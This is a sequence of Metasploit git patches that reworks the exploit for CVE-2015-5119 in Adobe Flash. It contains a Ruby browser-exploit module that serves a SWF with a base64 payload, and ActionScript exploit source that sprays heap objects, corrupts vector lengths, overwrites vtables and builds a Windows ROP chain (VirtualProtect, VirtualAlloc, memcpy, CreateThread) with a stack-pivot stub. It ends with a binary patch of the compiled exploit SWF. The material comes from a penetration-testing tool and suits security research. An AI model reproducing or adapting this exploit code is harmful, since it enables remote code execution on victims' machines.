               return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
             when 'Linux'
               return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
@@ -105,12 +104,6 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
-    if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
-      print_warning("Target setup not supported")
-      send_not_found(cli)
-      return
-    end
-
     if request.uri =~ /\.swf$/
       print_status('Sending SWF...')
       send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
@@ -125,7 +118,6 @@ class Metasploit3 < Msf::Exploit::Remote
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
     b64_payload = Rex::Text.encode_base64(target_payload)
-    os_name = target_info[:os_name]
 
     if target.name =~ /Windows/
       platform_id = 'win'
@@ -138,9 +130,9 @@ class Metasploit3 < Msf::Exploit::Remote
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
     </object>
     </body>
     </html>

From 138789b77cf9cc9e8205b23f161875915b344eb7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 15 Jul 2015 18:29:28 -0500
Subject: [PATCH 0792/1013] Fix indentation

---
 .../exploits/CVE-2015-5119/Exploiter.as       | 92 +++++++++----------
 1 file changed, 45 insertions(+), 47 deletions(-)

diff --git a/external/source/exploits/CVE-2015-5119/Exploiter.as b/external/source/exploits/CVE-2015-5119/Exploiter.as
index e7ef880af7..591cdce944 100755
--- a/external/source/exploits/CVE-2015-5119/Exploiter.as
+++ b/external/source/exploits/CVE-2015-5119/Exploiter.as
@@ -17,18 +17,18 @@ package
         private var stack_object:uint
         private var payload_space_object:uint
         private var buffer_object:uint
-		private var magic:uint
-		private var magic_arg0:uint
-		private var magic_arg1:uint
-		private var magic_object:uint
-		private var magic_table:uint
+        private var magic:uint
+        private var magic_arg0:uint
+        private var magic_arg1:uint
+        private var magic_object:uint
+        private var magic_table:uint
         private var buffer:uint
         private var vtable:uint
         private var stack_address:uint
         private var payload_address:uint 
-		private var stub_address:uint
-		private var stub_space_object:uint
-		private var stub:Vector.<uint> = new Vector.<uint>(8) 
+        private var stub_address:uint
+        private var stub_space_object:uint
+        private var stub:Vector.<uint> = new Vector.<uint>(8) 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(90000)
@@ -55,17 +55,17 @@ package
             cleanup()
         }
 
-		static function Magic(...a){}
+        static function Magic(...a){}
 		
         private function spray_objects():void
         {
             Logger.log("[*] Exploiter - spray_objects()")
 			
-			// mov eax,[esp+0x4]
-			// xchg eax,esp
-			// rets
-			stub[0] = 0x0424448B
-			stub[1] = 0x0000C394
+            // mov eax,[esp+0x4]
+            // xchg eax,esp
+            // rets
+            stub[0] = 0x0424448B
+            stub[1] = 0x0000C394
 			
             for (var i:uint = 0; i < spray.length; i++) 
             {
@@ -74,8 +74,8 @@ package
                 spray[i][1] = exploit 
                 spray[i][2] = stack
                 spray[i][3] = payload_space
-				spray[i][4] = Magic
-				spray[i][5] = stub
+                spray[i][4] = Magic
+                spray[i][5] = stub
             } 
         }
         
@@ -93,9 +93,8 @@ package
             main = ev.at(pos + 1) - 1
             stack_object = ev.at(pos + 2) - 1
             payload_space_object = ev.at(pos + 3) - 1
-			magic = ev.at(pos + 4) - 1
-			Logger.log('magic: 0x' + magic.toString(16)) 
-			stub_space_object = ev.at(pos + 5) - 1
+            magic = ev.at(pos + 4) - 1
+            stub_space_object = ev.at(pos + 5) - 1
             if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
                 return false
             }
@@ -118,12 +117,11 @@ package
             vtable = ev.read(main)
             stack_address = ev.read(stack_object + 0x18)
             payload_address = ev.read(payload_space_object + 0x18)
-			stub_address = ev.read(stub_space_object + 0x18)
-			magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
-			magic_table = ev.read(magic_object)
-			
-			magic_arg0 = ev.read(magic + 0x1c)
-			magic_arg1 = ev.read(magic + 0x20)
+            stub_address = ev.read(stub_space_object + 0x18)
+            magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
+            magic_table = ev.read(magic_object)
+            magic_arg0 = ev.read(magic + 0x1c)
+            magic_arg1 = ev.read(magic + 0x20)
         }
         
         private function corrupt_byte_array():void
@@ -190,7 +188,7 @@ package
             eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
             eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
             eba.write(0, "\x89\x03", false) // mov [ebx], eax
-			eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
+            eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
 
             // Put the payload (command) in memory
             eba.write(payload_address + 8, payload, true); // payload
@@ -198,7 +196,7 @@ package
             // Put the fake stack on memory
             eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
             
-			eba.write(0, virtualprotect)
+            eba.write(0, virtualprotect)
 			
 			// VirtualProtect
             eba.write(0, virtualalloc)
@@ -230,26 +228,26 @@ package
             eba.write(0, 0)
             eba.write(0, 0)
 			
-			for (var i:uint; i < 0x100; i++) {
-				eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
-			}
-			
-			// VirtualProtect the stub with a *reliable* stackpivot
-			eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
-			eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
-			eba.write(magic + 0x1c, stub_address)
-			eba.write(magic + 0x20, 0x10)
-			var args:Array = new Array(0x41)
-			Magic.call.apply(null, args);
-			
-			// Call to our stackpivot and init the rop chain
-			eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
-			eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
-			eba.write(magic + 0x1c, stack_address + 0x18000)
-			Magic.call.apply(null, null);
-			eba.write(magic_object, magic_table);
-			eba.write(magic + 0x1c, magic_arg0)
-			eba.write(magic + 0x20, magic_arg1)
+            for (var i:uint; i < 0x100; i++) {
+            	eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
+            }
+
+            // VirtualProtect the stub with a *reliable* stackpivot
+            eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
+            eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+            eba.write(magic + 0x1c, stub_address)
+            eba.write(magic + 0x20, 0x10)
+            var args:Array = new Array(0x41)
+            Magic.call.apply(null, args);
+
+            // Call to our stackpivot and init the rop chain
+            eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
+            eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+            eba.write(magic + 0x1c, stack_address + 0x18000)
+            Magic.call.apply(null, null);
+            eba.write(magic_object, magic_table);
+            eba.write(magic + 0x1c, magic_arg0)
+            eba.write(magic + 0x20, magic_arg1)
         }
 
         private function do_rop_linux():void

From bd5d3724368197cd972d6c62f72d98c80056da1f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 15 Jul 2015 18:30:05 -0500
Subject: [PATCH 0793/1013] Add build comment

---
 external/source/exploits/CVE-2015-5119/Exploit.as | 1 +
 1 file changed, 1 insertion(+)

diff --git a/external/source/exploits/CVE-2015-5119/Exploit.as b/external/source/exploits/CVE-2015-5119/Exploit.as
index dcd43c5532..c6b04367f7 100755
--- a/external/source/exploits/CVE-2015-5119/Exploit.as
+++ b/external/source/exploits/CVE-2015-5119/Exploit.as
@@ -1,3 +1,4 @@
+// Build with Flex SDK 4.6 + AIR 3.1
 package 
 {
 	import flash.display.Sprite

From ab5c7a806ebed86cbb4afacd9f263538198e89dc Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 15 Jul 2015 18:32:45 -0500
Subject: [PATCH 0794/1013] Update flash exploiter

---
 external/source/flash_exploiter/Exploit.as   |   4 +-
 external/source/flash_exploiter/Exploiter.as | 146 ++++++++-----------
 2 files changed, 58 insertions(+), 92 deletions(-)
 mode change 100644 => 100755 external/source/flash_exploiter/Exploiter.as

diff --git a/external/source/flash_exploiter/Exploit.as b/external/source/flash_exploiter/Exploit.as
index f0aa9102da..6bcca0ee45 100755
--- a/external/source/flash_exploiter/Exploit.as
+++ b/external/source/flash_exploiter/Exploit.as
@@ -25,13 +25,11 @@ package
         private var b64:Base64Decoder = new Base64Decoder()
         private var payload:ByteArray
         private var platform:String
-        private var os:String
         private var exploiter:Exploiter
                 
         public function Exploit()
         {
             platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-            os = LoaderInfo(this.root.loaderInfo).parameters.os
             var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
             var pattern:RegExp = / /g;
             b64_payload = b64_payload.replace(pattern, "+")
@@ -42,7 +40,7 @@ package
                 The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
             */
             
-            exploiter = new Exploiter(this, platform, os, payload, uv, 0x13e)
+            exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
         }
     }
 }
diff --git a/external/source/flash_exploiter/Exploiter.as b/external/source/flash_exploiter/Exploiter.as
old mode 100644
new mode 100755
index ecbf56fac5..591cdce944
--- a/external/source/flash_exploiter/Exploiter.as
+++ b/external/source/flash_exploiter/Exploiter.as
@@ -11,27 +11,33 @@ package
         private var eba:ExploitByteArray
         private var payload:ByteArray
         private var platform:String
-        private var op_system:String
         private var pos:uint
         private var byte_array_object:uint
         private var main:uint
         private var stack_object:uint
         private var payload_space_object:uint
         private var buffer_object:uint
+        private var magic:uint
+        private var magic_arg0:uint
+        private var magic_arg1:uint
+        private var magic_object:uint
+        private var magic_table:uint
         private var buffer:uint
         private var vtable:uint
         private var stack_address:uint
         private var payload_address:uint 
+        private var stub_address:uint
+        private var stub_space_object:uint
+        private var stub:Vector.<uint> = new Vector.<uint>(8) 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(90000)
 
-        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
         {
             exploit = exp
             payload = p
             platform = pl
-            op_system = os
 
             ev = new ExploitVector(uv, uv_length)
             if (!ev.is_ready()) return
@@ -49,9 +55,18 @@ package
             cleanup()
         }
 
+        static function Magic(...a){}
+		
         private function spray_objects():void
         {
             Logger.log("[*] Exploiter - spray_objects()")
+			
+            // mov eax,[esp+0x4]
+            // xchg eax,esp
+            // rets
+            stub[0] = 0x0424448B
+            stub[1] = 0x0000C394
+			
             for (var i:uint = 0; i < spray.length; i++) 
             {
                 spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@@ -59,6 +74,8 @@ package
                 spray[i][1] = exploit 
                 spray[i][2] = stack
                 spray[i][3] = payload_space
+                spray[i][4] = Magic
+                spray[i][5] = stub
             } 
         }
         
@@ -76,6 +93,8 @@ package
             main = ev.at(pos + 1) - 1
             stack_object = ev.at(pos + 2) - 1
             payload_space_object = ev.at(pos + 3) - 1
+            magic = ev.at(pos + 4) - 1
+            stub_space_object = ev.at(pos + 5) - 1
             if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
                 return false
             }
@@ -98,6 +117,11 @@ package
             vtable = ev.read(main)
             stack_address = ev.read(stack_object + 0x18)
             payload_address = ev.read(payload_space_object + 0x18)
+            stub_address = ev.read(stub_space_object + 0x18)
+            magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
+            magic_table = ev.read(magic_object)
+            magic_arg0 = ev.read(magic + 0x1c)
+            magic_arg1 = ev.read(magic + 0x20)
         }
         
         private function corrupt_byte_array():void
@@ -138,13 +162,7 @@ package
             if (platform == "linux") {
                 do_rop_linux()
             } else if (platform == "win") {
-                if (op_system == "Windows 8.1") {
-                    do_rop_windows8()
-                } else if (op_system == "Windows 7") {
-                    do_rop_windows()
-                } else {
-                    return
-                }
+                do_rop_windows()
             } else {
                 return
             }
@@ -167,88 +185,20 @@ package
             var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
             // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
             eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+            eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
 
             // Put the payload (command) in memory
             eba.write(payload_address + 8, payload, true); // payload
 
-            // Put the fake vtabe / stack on memory
-            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            // Put the fake stack on memory
             eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-            eba.write(0, virtualprotect)
-
-            // VirtualProtect
-            eba.write(0, virtualalloc)
-            eba.write(0, buffer + 0x10)
-            eba.write(0, 0x1000)
-            eba.write(0, 0x40)
-            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
-
-            // VirtualAlloc
-            eba.write(0, memcpy)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0x4000)
-            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
-            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
-
-            // memcpy
-            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, payload_address + 8)
-            eba.write(0, payload.length) 
-
-            // CreateThread
-            eba.write(0, createthread)
-            eba.write(0, buffer + 0x10) // return to fix things
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0)
-           
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-            exploit.toString() // call method in the fake vtable
-        }
-
-        private function do_rop_windows8():void
-        {
-            Logger.log("[*] Exploiter - do_rop_windows8()")
-            var pe:PE = new PE(eba)
-            var flash:uint = pe.base(vtable)
-            var winmm:uint = pe.module("winmm.dll", flash)
-            var advapi32:uint = pe.module("advapi32.dll", flash)
-            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
-            var kernel32:uint = pe.module("kernel32.dll", winmm) 
-            var ntdll:uint = pe.module("ntdll.dll", kernel32)
-            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
-            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
-            var createthread:uint = pe.procedure("CreateThread", kernelbase)
-            var memcpy:uint = pe.procedure("memcpy", ntdll)
-            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
-            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
-            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
-            // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
-            eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-            // Put the payload (command) in memory
-            eba.write(payload_address + 8, payload, true); // payload
-
-            // Put the fake vtabe / stack on memory
-            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
-            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
             eba.write(0, virtualprotect)
-
-            // VirtualProtect
+			
+			// VirtualProtect
             eba.write(0, virtualalloc)
             eba.write(0, buffer + 0x10)
             eba.write(0, 0x1000)
@@ -257,14 +207,14 @@ package
 
             // VirtualAlloc
             eba.write(0, memcpy)
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0x4000)
             eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
             eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
 
             // memcpy
             eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, payload_address + 8)
             eba.write(0, payload.length) 
 
@@ -273,13 +223,31 @@ package
             eba.write(0, buffer + 0x10) // return to fix things
             eba.write(0, 0)
             eba.write(0, 0)
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0)
             eba.write(0, 0)
             eba.write(0, 0)
+			
+            for (var i:uint; i < 0x100; i++) {
+            	eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
+            }
 
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-            exploit.toString() // call method in the fake vtable
+            // VirtualProtect the stub with a *reliable* stackpivot
+            eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
+            eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+            eba.write(magic + 0x1c, stub_address)
+            eba.write(magic + 0x20, 0x10)
+            var args:Array = new Array(0x41)
+            Magic.call.apply(null, args);
+
+            // Call to our stackpivot and init the rop chain
+            eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
+            eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+            eba.write(magic + 0x1c, stack_address + 0x18000)
+            Magic.call.apply(null, null);
+            eba.write(magic_object, magic_table);
+            eba.write(magic + 0x1c, magic_arg0)
+            eba.write(magic + 0x20, magic_arg1)
         }
 
         private function do_rop_linux():void

From a6379213053039a855132cf628e2b71c6a6f417c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 15 Jul 2015 18:35:41 -0500
Subject: [PATCH 0795/1013] Update swf

---
 data/exploits/CVE-2015-5119/msf.swf | Bin 49715 -> 49651 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-5119/msf.swf b/data/exploits/CVE-2015-5119/msf.swf
index f083d2aa4b6e102f6558ee4971854744abac8d2f..c1a78dee0c2bb2c564bf287dc08f6bc6045263f7 100755
GIT binary patch
literal 49651
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
